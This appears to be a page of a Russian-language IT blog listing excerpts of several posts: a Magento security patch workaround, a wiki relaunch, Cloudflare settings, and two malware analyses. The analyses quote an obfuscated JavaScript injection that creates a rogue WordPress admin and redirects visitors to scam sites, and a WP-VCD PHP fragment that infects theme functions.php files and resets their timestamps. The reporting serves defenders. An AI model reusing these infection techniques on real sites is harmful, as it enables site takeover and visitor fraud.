БЛОГ


В данном материале будет показан способ альтернативного обновления Magento , статья переводная.

Для популярного движка электронной коммерции Magento 28 сентября 2017 года был выпущен патч 10415 SUPEE 1.9.3.7 для решения нескольких критических проблем безопасности, таких как удаленное выполнение произвольного кода, межсайтовый скриптинг и так далее.

До сих пор не все владельцы ресурсов  обновили свои сайты, основная причина – использование SSL для установки обновлений, что и является основным препятствием для обновления.

Компания Magecomp предлагает альтернативный способ наложения патчей и рекомендует как можно скорее установить их, чтобы защитить Magento от возможных угроз безопасности.

После длительного (по многим причинам) простоя проект снова запущен.

Вики Миасс перенесен на другую платформу (что заняло много времени) и сейчас доступен не только полноценный визуальный редактор, но и все остальные возможности  современных сайтов.

Поскольку практически 70% просмотров до закрытия было с мобильных устройств, сайт максимально оптимизирован именно под мобильные. Также применена  максимально простая и легкая верстка.  По данным PageSpeed сайт получил оценку 95 из 100

Также подключен практически обязательный, сейчас https

В предыдущем материале рассказывалось о подключении сайта к CDN сервису CloudFlare, в этой статье рассмотрим основные настройки.

Вкладки

Вкладка Overview

– можно перевести как «общие настройки», где показываются общие настройки, уровень шифрования, кэширования и так далее.

Слева от статуса сайта есть выпадающий список с выбором быстрых действий.

Under attack mode – режим «под атакой», в этом режиме сайт открывается с задержкой, основное назначение – защита от DDoS-атак. После включения опции будет доступно несколько уровней защиты от low до high.

Developing mode – режим «разработки», отключает кэширование на сайте. Обычно опция востребована при отладке сайта, когда изменения сразу же отображаются на ресурсе, иначе все вносимые обновления будут отображаться с задержкой.

Security Level – режим «уровень безопасности» – по умолчанию выключен «Essentially Off», при включении будут доступны следующие опции:

Rate Limiting – режим «ограничение скорости», используется для блокировки IP-адресов с вредоносными запросами, как сканирование, или если тарифный план имеет ограничение по трафику.

Внимание, функция платная. Первые 10 000 запросов являются бесплатными. Далее $ 0,05 за 10 000 запросов.

В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Страница 5 из 10